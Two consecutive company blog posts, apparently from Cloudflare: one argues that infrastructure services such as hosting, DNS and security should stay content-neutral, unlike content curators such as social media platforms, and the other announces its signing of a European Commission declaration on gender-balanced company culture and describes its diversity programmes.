We spoke with organizations that have made it their mission to fight hate and intolerance, with human rights organizations that depend on access to the Internet, with tech companies doing their best to moderate content, with academics who think about and research all aspects of content online, and with interested government and non-governmental organizations on two continents. In the end, we spoke with hundreds of different experts, groups, and entities about how different companies and different types of services address troubling content at different places in the Internet stack.

Our overwhelming sense from these conversations is that the Internet, and the industry that has grown up around it, is at a crossroads. Policy makers and the public are rightly upset about misuse of the Internet. We heard repeatedly that the world is moving away from the Internet as a neutral platform for people to express themselves and access information. Many governments and many of the constituents they represent appear to want the Internet cleaned up and stripped of troubling content through any technical means necessary, even if it means that innovation will be stifled and legitimate voices will be silenced. And companies large and small seem to be going along with it.

Moving forward

We’ve thought long and hard about what’s next, both for us and the Internet in general. Although we share concerns about the exploitation of online tools, we are convinced that there are ways forward that do not shortchange the security, availability, and promise of the Internet. We think the right solution will take us out of the clouds and into the weeds. We have to figure out what core functions need to be protected to have the Internet we want, and we will have to get away from the idea that there’s a one-size-fits-all solution that will address the problems we see. 
If we really want to address risks online while maintaining the Internet as a forum for communication, commerce, and free expression, different kinds of services are going to have to deal with abuse differently. The more we talked to people, the more we saw a fundamental split on the Internet between the services that substantively touch content and the infrastructure services that do not. It's possible that, as a company that provides largely infrastructure services ourselves, we were looking for this distinction. But we believe the distinction is real and helps explain why different businesses make distinctly different choices. As we discuss in our blog posts on transparency this week, the approach to questions about abuse complaints will mean different things for different Cloudflare products. Although we are not yet at the point where Cloudflare's products organize, analyze, or promote content, we are aware that this conclusion may have implications for us in the future.

Content curators

The Internet has revolutionized the way we communicate and access information. Because of the way the Internet works, everyone online has the opportunity to create and consume the equivalent of their own newspaper or television network. Almost any content you could want is available, if you can find it. That idea is at the heart of the divide between services that curate content -- like social media platforms and search engines -- and basic Internet infrastructure services.

Content curators make content-based decisions for a business purpose. For a search engine, that might mean algorithmically reviewing content to best match what the user is seeking. For a social media site, it might be a review of content to help predict what content the user will want to see next or what advertising might be most appealing. For these types of online products, users understand and generally expect that the services will vary based on content.
Different search engines yield different results; different social media platforms will promote different content for you to review. These services are the Internet's equivalents of the very small circle of newspaper editors or television network executives of old, making decisions about what you see online based on what they think you'll want to see. The value in these content curator services depends on how well they analyze, use, and make judgments about content. From a business perspective, that means these services want the flexibility to include or exclude particular content from their platforms. For example, it makes perfect sense for a platform that advertises itself as building community to have rules that prevent the community from being disrupted by hate-filled messages and disturbing content. We should expect content curator services to moderate content and should give them the flexibility to do so. If these services are transparent about what they allow and don't allow, and about how they make decisions about what to exclude, they can be held accountable the same way people hold other businesses to account. If people don't like the judgments being made, they can take their business to a platform or service that's a better fit.

Basic Internet infrastructure services

Basic Internet services, on the other hand, facilitate the business of other providers and website owners by providing infrastructure that enables access to the Internet. These types of services -- which Matthew described in detail in the Daily Stormer blog post -- include telecommunications services, hosting services, domain name services such as registry and registrar services, and services that help optimize and secure Internet transmissions. The core expertise of these services is not content analysis, but providing the infrastructure needed for someone else to develop and analyze that content.
Because people expect these infrastructure services to be used to provide technical access to the Internet, the notion that they might be used to monitor what you're doing online or to make decisions about what content you should be entitled to access feels like a misuse, or even an invasion of privacy. Internet infrastructure is a lot like other kinds of physical infrastructure. At some basic level, we believe that everyone should be allowed to have housing, electricity, or telephone service, no matter what they plan to do with those services. Or that individuals should be able to send packages through FedEx or walk down the street wearing a backpack with a reasonable expectation that they won't be subject to unfounded search or monitoring. Much as we believe that the companies providing these services should provide them to all, not just those with whom they agree, we continue to believe that basic Internet infrastructure services, which provide the building blocks for other people to create and access content online, should be provided in a content-neutral way.

Complicated companies

Developing different expectations for content curation services and infrastructure services is tougher than it seems. Behemoths best known for content curation often provide infrastructure services as well. Alphabet, for example, provides content-neutral infrastructure services to millions of customers through Google Cloud and Google Domains, while also running one of the world's largest content curation sites in YouTube. And even if companies try to distinguish their infrastructure from their content curation services, their customers may not. In a world where content needs to be on a large network to stay online, only a handful of companies can meet that need. Reducing that handful to those -- like Cloudflare -- that fall solely into the infrastructure bucket makes the number almost impossibly small.
That is why we want to do a better job of talking about differences in expectations not by company, but by service. And maybe we should also recognize that having only a small number of companies with networks robust enough to keep content online -- most of which do content curation -- is part of the problem. If you believe that the only way to be online is to be on a platform that curates content, you're going to be rightly skeptical of that company's right to take down content it doesn't want on its site. That doesn't mean a business that depends on analyzing content has to stop doing it, but it does make it that much more important that we have neutral infrastructure. Without it, it might be impossible for an alternate platform to be built, and for certain voices to have a presence online.

The good news is that we're not alone in our view of the fundamental difference between content curators and Internet infrastructure services. From the criticism we received for the Daily Stormer decision, to the commentary of Mike Masnick at Techdirt, to the academic analysis of Yale Law Professor Jack Balkin, to the call of the Global Commission on the Stability of Cyberspace (GCSC) to protect the "public core" of the Internet, there's an increasing awareness that failing to protect neutral Internet infrastructure could undermine the Internet as we know it.

Thoughts on due process

In his blog post on the Daily Stormer decision, Matthew talked about the importance of due process: the idea that you should be able to know the rules a system will follow if you participate in that system. But what we've learned in our follow-up conversations is that due process means something different for content curators. There has been a clamor for companies like Facebook and Google to explain how they make decisions about what to show their users, what they take down, and how someone can challenge those decisions.
Facebook has even developed an "Oversight Board for Content Decisions" -- dubbed Facebook's supreme court -- that is empowered to oversee the decisions the company makes based on its terms of service. Given that this process is grounded in terms of service, which the company can change at will to accommodate business decisions, it mostly seems like a way to build confidence in the company's decision-making process. Instituting an internal review process may make users feel that decisions are less arbitrary, which may help the company keep people in its community.

That idea of entirely privatized due process may make sense for content curators, who make content decisions by necessity, but we don't believe it makes sense for those who provide infrastructure services. When access to basic Internet services is on the line, due process has to mean rules set and adjudicated by external decision-makers.

Abuse on Internet infrastructure

Although we don't believe it is appropriate for Cloudflare to decide which voices get to stay online by terminating basic Internet services because we think content is a problem, that's far from the end of the story. Even for Internet infrastructure, there are other ways that problematic content online can be, and is, addressed. Laws around the world provide mechanisms for addressing particular types of content online that governments decide are problematic. We can save for another day whether any particular law provides adequate due process and balances rights appropriately, but at a minimum, those who make these laws typically have a political legitimacy that infrastructure companies do not. Tomorrow, we'll talk about how we are operationalizing our view that it's important to get into the weeds, by considering how different laws apply to us on a service-by-service and function-by-function basis.

Cloudflare Signs European Commission Declaration on Gender Balanced Company Culture

Last week Cloudflare attended a roundtable meeting in Brussels convened by the European Commissioner for Digital Economy and Society, Mariya Gabriel, with all signatories of the Tech Leaders' Declaration on Gender Balanced Company Culture. Cloudflare joined this European Commission initiative late last year and, along with other companies, we are committed to taking a hands-on approach to close the digital gender divide in skills, inception of technologies, access and career opportunities.

In particular, we have all committed to implementing, promoting and spreading five specific actions to achieve equality of opportunities for women in our companies and in the digital sector at large:

- Instil an inclusive, open, female-friendly company culture
- Recruit and invest in diversity
- Give women in tech their voice and visibility
- Create the leaders of the future
- Become an advocate for change

The project, spearheaded by the Digital Commissioner as part of a range of actions to promote gender balance in the digital industry, allows for the exchange of ideas and best practices among companies, with opportunities to chart progress and also to discuss the challenges we face. Many companies around the table shared their inspiring stories of steps taken at company level to encourage diversity, push back against societal restraints and address unconscious biases at work. Flexible work practices and policies, the importance of network building and mentoring, employee training, clear career progression paths for women and pay equality can all play a part in creating a more diverse workplace. Confidence building, including for public speaking, was also an important factor raised by many participants.
Despite ongoing efforts, such as the No Women No Panel campaign launched in Brussels last year, a recent report issued by EU Panel Watch noted that women's voices are still not distributed evenly across conference topics, with a very clear feminisation, masculinisation and radicalisation of sectors. The sectors showing the lowest levels of speaker participation by women, particularly for keynotes, included telecommunications and technology. Although progress is taking place, it is happening much too slowly.

European Commission, DG Connect: Commissioner Gabriel and company signatories

Cloudflare initiatives

Despite being one of the youngest companies at the table, Cloudflare has put significant effort into diversity and inclusion programmes, including on gender, as we have an unwavering commitment to the idea that everybody should be treated fairly and feel comfortable and respected at work. We also strongly believe in the importance of having diverse teams design, build and test our products in order to ensure their success. We have found that diversity, in all its forms, fosters better innovation and creativity in our company through a greater variety of problem-solving approaches and perspectives, while increasing employee satisfaction and collaboration. McKinsey has also explored the link between a company's financial performance and its gender diversity, which underscores the importance of non-homogenous teams in the workplace.

Cloudflare's commitment comes from the very top of management -- with no finer example than our co-founder Michelle Zatlyn -- but we also adopt a bottom-up approach with our Cloudflare Aware (Diversity & Inclusion) Programme, which offers everyone a chance to contribute to different initiatives through employee-driven working groups. We also partner with external organisations, such as Toastmasters, which facilitates sessions for all employees to practice their public speaking and communication skills in a 'safe' environment.
This enables our female employees in particular to build a pathway towards high-profile speaking engagements externally -- should they wish to do so -- and so play their part in bringing increased diversity to public debates. In fact, we take every opportunity we can to underline the importance of closing the gender gap, even if it means doing something as simple as allowing early access to our Registrar service in exchange for donations to Girls Who Code.

The majority of Cloudflare's jobs are in software engineering, and it can be challenging to recruit female talent in this area. We are particularly keen to speak to women from an engineering background, so please do check out our careers page and spread the word! As a sector, we need to do more collectively to close the gender gap, and with this in mind, we have also recently added our name to the UK Tech Talent Charter. This UK Government-supported initiative is an industry collective which recognizes that real, meaningful change can only happen through working together and joining forces.

As International Women's Day approaches, and with this year's campaign theme being #BalanceforBetter, we will be announcing more activities in this space and seizing the opportunity to celebrate women's achievements with groups worldwide.

